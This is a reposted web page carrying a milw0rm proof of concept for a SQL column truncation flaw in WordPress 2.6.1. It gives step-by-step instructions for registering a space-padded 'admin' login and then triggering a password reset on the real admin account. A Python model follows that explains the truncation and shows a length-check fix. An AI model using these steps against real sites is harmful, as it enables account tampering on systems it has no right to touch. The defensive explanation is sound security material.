WordPress 2.6.1 SQL Column Truncation Vulnerability

2019-02-02 08:00:04 | Author: 震博

WordPress users should take note.

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: https://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# https://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin x
email: your email

^ admin[55 space chars]x

now, we have duplicated admin account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be sent to correct admin email ;/

# milw0rm.com
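
Why step 2 leaves two rows that both match "admin", as an added example that is not part of the original PoC and is not WordPress or MySQL code: a Python model of a login column under non-strict truncation and trailing-space-insensitive comparison, with a check-then-insert registration beside one that validates length first. The 60-character width is an assumption consistent with "admin[55 space chars]x" being 61 characters; `UsersTable`, `register_unchecked` and `register_hardened` are hypothetical names.

```python
COLUMN_WIDTH = 60  # assumption: login column is VARCHAR(60); the PoC value is 5 + 55 + 1 = 61 chars


def mysql_equal(a, b):
    """Compare the way a PAD SPACE collation does: trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")


class UsersTable:
    """Toy model of the login column, not WordPress or MySQL code."""

    def __init__(self, strict=False):
        self.strict = strict        # True models sql_mode=STRICT_ALL_TABLES
        self.logins = ["admin"]     # constructed sample row: the real admin

    def select(self, login):
        return [row for row in self.logins if mysql_equal(row, login)]

    def insert(self, login):
        if len(login) > COLUMN_WIDTH:
            if self.strict:
                raise ValueError("Data too long for column")
            login = login[:COLUMN_WIDTH]  # non-strict mode: silent truncation
        self.logins.append(login)


def register_unchecked(table, login):
    """Check-then-insert with no length validation (the weak pattern)."""
    if table.select(login):         # the over-long value ends in 'x', so no match
        return False
    table.insert(login)             # stored as 'admin' plus trailing spaces
    return True


def register_hardened(table, login):
    """Validate length and padding in the application before touching the table."""
    if len(login) > COLUMN_WIDTH or login != login.strip():
        return False
    return register_unchecked(table, login)


PADDED = "admin" + " " * 55 + "x"   # constructed input in the shape the PoC describes

if __name__ == "__main__":
    weak, hard = UsersTable(), UsersTable()
    print(register_unchecked(weak, PADDED), len(weak.select("admin")))
    print(register_hardened(hard, PADDED), len(hard.select("admin")))
```

Either control alone blocks the duplicate in this model: strict SQL mode turns the truncation into an error, and the application-side length check rejects the value before the uniqueness lookup runs.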
